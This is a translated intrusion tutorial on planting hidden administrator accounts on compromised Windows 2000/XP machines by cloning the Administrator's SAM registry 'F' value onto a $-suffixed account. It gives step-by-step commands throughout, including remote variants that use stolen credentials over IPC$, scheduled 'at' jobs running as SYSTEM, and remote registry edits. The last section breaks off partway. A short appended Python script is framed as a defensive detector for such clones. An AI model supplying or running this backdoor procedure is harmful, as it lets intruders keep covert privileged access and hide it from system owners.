First, how to establish a hidden superuser in the graphical interface

The method of the author I mentioned above is very good, but it is more complicated and it uses psu.exe (a program that runs another program as the SYSTEM user), which means uploading psu.exe to the compromised host. The method I describe here does not need psu.exe. Windows 2000 has two registry editors: regedit.exe and regedt32.exe. (In XP, regedit.exe and regedt32.exe are actually one program; the permissions of a key are changed by right-clicking it and choosing "Permissions".) I think everyone is familiar with regedit.exe, but it cannot set permissions on registry keys; the greatest advantage of regedt32.exe is that it can. NT/2000/XP account information is stored under the HKEY_LOCAL_MACHINE\SAM\SAM key of the registry, but no user other than the SYSTEM user has the right to view the information inside. So I first use regedt32.exe to give myself "Full Control" permission on the SAM key, which makes the information in the SAM key readable and writable. The specific steps are as follows:

1. Suppose we are logged on to the terminal service of a compromised host as the superuser administrator. First create an account, hacker$, from the command line or the account manager. Here I create it on the command line: net user hacker$ 1234 /add

2. Click "Start" → "Run", enter regedt32.exe and press Enter to start regedt32.exe.

3. Click "Permissions". In the window that pops up, click Add and add the account I am logged in with to the security list. Here I am logged in as administrator, so I add administrator and set its permission to "Full Control". One thing needs explaining: it is best to add the account you are logged in with, or the group it belongs to, and not to modify the existing accounts or groups, otherwise a series of unnecessary problems will follow. Once the hidden superuser is built, come back here and delete the account you added.

4. Click "Start" → "Run", enter regedit.exe and press Enter to start the registry editor regedit.exe. Open the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker$.

5. Export the items hacker$, 00000409 and 000001F4 as hacker.reg, 409.reg and 1f4.reg. Open the exported files in Notepad, copy the value of "F" under the superuser's key 000001F4 and use it to overwrite the value of "F" under the key corresponding to hacker$, then merge 00000409.reg with hacker.reg.

6. On the command line, run net user hacker$ /del to delete the user hacker$.

7. Press F5 in the regedit.exe window to refresh, then choose File → Import Registry File and import the modified hacker.reg into the registry.

8. At this point the hidden superuser hacker$ is built; close regedit.exe. In the regedt32.exe window, restore the permissions of the HKEY_LOCAL_MACHINE\SAM\SAM key (just remove the added account administrator).

9. Note: after the hidden superuser is built, the hacker$ user is not visible in the account manager, and the "net user" command on the command line does not show it either. However, once the superuser is built you can no longer change its password: if you use the net user command to change the password of hacker$, the hidden superuser becomes visible in the account manager and cannot be deleted.

Second, how to remotely create a hidden superuser on the command line

This uses the at command: scheduled tasks created by at run as SYSTEM, so the psu.exe program is not needed. To be able to use the at command, the compromised host must have the Schedule service running. If it is not running, the tool netsvc.exe or sc.exe in the stream of light can start it remotely; of course, any other method that starts the Schedule service works as well. For the command line you can use a variety of connection methods, for example connecting to MSSQL's port 1433 with SQLEXEC, or getting a cmdshell over Telnet, as long as there is permission to run the at command.

1. First find a compromised host; how to get one is not what I discuss here. Assume we have found a host whose superuser is administrator with the password 12345678, and now we start to remotely establish a hidden superuser on the command line. (The host in the example is a host on my local area network. I changed its IP address to 13.50.97.238; do not look that address up on the Internet, to avoid harassing a normal IP address.)

2. First establish a connection with the compromised host. The command is: net use \\13.50.97.238\ipc$ "12345678" /user:"administrator"

3. Create a user on the host with the at command (if the at service is not started, it can be started remotely with netsvc.exe or sc.exe): at \\13.50.97.238 12:51 c:\winnt\system32\net.exe user hacker$ 1234 /add
The user name is built with the $ suffix because, with the suffix added, the command line will not display this user, although the account manager can still see it.

4. With the same kind of command, export the keys under HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users: at \\13.50.97.238 12:55 c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\
/e is a regedit.exe parameter; the key path HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ must end with "\". If necessary, enclose the command in quotation marks: "c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\".

5. Download hacker.reg from the host to the local machine and edit it with Notepad. The command is: copy \\13.50.97.238\admin$\system32\hacker.reg c:\hacker.reg
The editing is the same as in the graphical-interface method and is not repeated here.

6. Copy the edited hacker.reg back to the host: copy c:\hacker.reg \\13.50.97.238\admin$\system32\hacker1.reg

7. Check the host's time with net time \\13.50.97.238, then use the at command to delete the user hacker$: at \\13.50.97.238 13:40 net user hacker$ /del

8. Verify that hacker$ is deleted: disconnect from the host with net use \\13.50.97.238 /del, then try to connect to the host with the hacker$ account: net use \\13.50.97.238\ipc$ "1234" /user:"hacker$". If the connection fails, the account has been deleted.

9. Establish the connection with the host again: net use \\13.50.97.238\ipc$ "12345678" /user:"administrator". Get the host's time, then use the at command to import the hacker1.reg that was copied to the host into its registry: at \\13.50.97.238 13:41 c:\winnt\regedit.exe /s hacker1.reg
The /s parameter of regedit.exe means quiet mode.

10. Verify that hacker$ has been established; the method is the same as the check above for whether hacker$ was deleted.

11. Then verify that the user hacker$ has read, write and delete permissions. If you are still not sure, you can also verify that it can create other accounts.

12. Step 11 shows that the user hacker$ has superuser privileges: the account I originally created with the at command was a normal user, but it now has remote read, write and delete permissions.

Third, if the compromised host does not have the 3389 terminal service open and I don't want to use the command line, what should I do?

In this case you can also use the graphical interface to establish a hidden superuser on the host. Because regedit.exe and regedt32.exe can both connect to a network registry, you can use regedt32.exe to set permissions on the registry keys of the remote host and regedit.exe to edit the remote registry. The account manager can also connect to another computer, so you can use it to create and delete accounts on the remote host. The specific steps are similar to the ones above, so I won't say much; the only problem is that its speed is unbearable.
But there are two prerequisites here:

1. First use net use \\compromised-host-IP\ipc$ "password" /user:"superuser name" to establish a connection with the remote host; only then can regedit.exe, regedt32.exe and the account manager connect to the remote host.

2. The remote host must have the Remote Registry service running (if it is not, you can start it remotely, because you have the superuser password).

Fourth, establish a hidden superuser with a disabled account

We can use an account that is disabled on the compromised host to establish the hidden superuser. The method is as follows:

1. First look carefully at which users are disabled. In general, some administrators disable guest for security, and of course other accounts may be disabled too. In the graphical interface this is very easy: a disabled account shows a red cross. On the command line I haven't thought of a good way; I can only run "net user user-name" for the users one by one to see whether each is disabled.

2. Here, we assume that the user hacker is disabled by the administrator.
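
From the defender's side, the cloning described in the sections above (an account key whose "F" value was overwritten with the one from 000001F4) can be checked in an export of the Users key. The Python below is an added example, not code from the original article; it assumes the RID is stored at offset 0x30 of "F" and that the default value type of each Names subkey is the account's RID, neither of which the article states, and it runs on a constructed sample export.

```python
import re
import struct

USERS = r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"
RID_OFFSET = 0x30  # assumed layout: 4-byte little-endian RID inside the "F" value
KEY_RE = re.compile(r"\[" + re.escape(USERS) + r"\\(Names\\)?([^\]\\]+)\]", re.I)

def parse_users(reg_text):
    """Return ({rid: F bytes}, {rid: account name}) from a regedit /e export."""
    text = re.sub(r"\\\r?\n\s*", "", reg_text)  # join wrapped hex lines
    f_values, names, rid, name = {}, {}, None, None
    for line in map(str.strip, text.splitlines()):
        if line.startswith("["):
            rid = name = None
            m = KEY_RE.fullmatch(line)
            if m and m.group(1):
                name = m.group(2)  # ...\Users\Names\<account>
            elif m and re.fullmatch(r"[0-9A-Fa-f]{8}", m.group(2)):
                rid = int(m.group(2), 16)  # ...\Users\<RID in hex>
        elif rid is not None and line.startswith('"F"=hex:'):
            f_values[rid] = bytes.fromhex(line[8:].replace(",", ""))
        elif name is not None and (m := re.fullmatch(r"@=hex\(([0-9a-fA-F]+)\):", line)):
            names[int(m.group(1), 16)] = name  # value type of the Names key = RID
    return f_values, names

def find_cloned_accounts(reg_text):
    """List accounts whose F value carries a RID other than their own key name."""
    f_values, names = parse_users(reg_text)
    findings = []
    for rid, blob in sorted(f_values.items()):
        if len(blob) < RID_OFFSET + 4:
            continue  # truncated value, nothing to compare
        inner = struct.unpack_from("<I", blob, RID_OFFSET)[0]
        if inner != rid:
            findings.append({"rid": rid, "name": names.get(rid), "f_rid": inner,
                             "exact_copy": f_values.get(inner) == blob})
    return findings

def _f_hex(rid):  # constructed 80-byte F value, wrapped the way regedit wraps hex
    blob = bytes(RID_OFFSET) + struct.pack("<I", rid) + bytes(80 - RID_OFFSET - 4)
    return ",\\\n  ".join(",".join(f"{b:02x}" for b in blob[i:i + 25]) for i in range(0, 80, 25))

# Constructed sample export: key 00000409 (hacker$) holds a copy of 000001F4's F value.
SAMPLE = "REGEDIT4\n\n" + "\n".join(
    f'[{USERS}\\{key}]\n"F"=hex:{_f_hex(f_rid)}\n'
    for key, f_rid in [("000001F4", 0x1F4), ("000003E8", 0x3E8), ("00000409", 0x1F4)]
) + f"\n[{USERS}\\Names\\hacker$]\n@=hex(409):\n"

if __name__ == "__main__":
    print(find_cloned_accounts(SAMPLE))
```

The RID comparison still fires after the two "F" values have drifted apart, which is why exact_copy is reported separately instead of being used as the test.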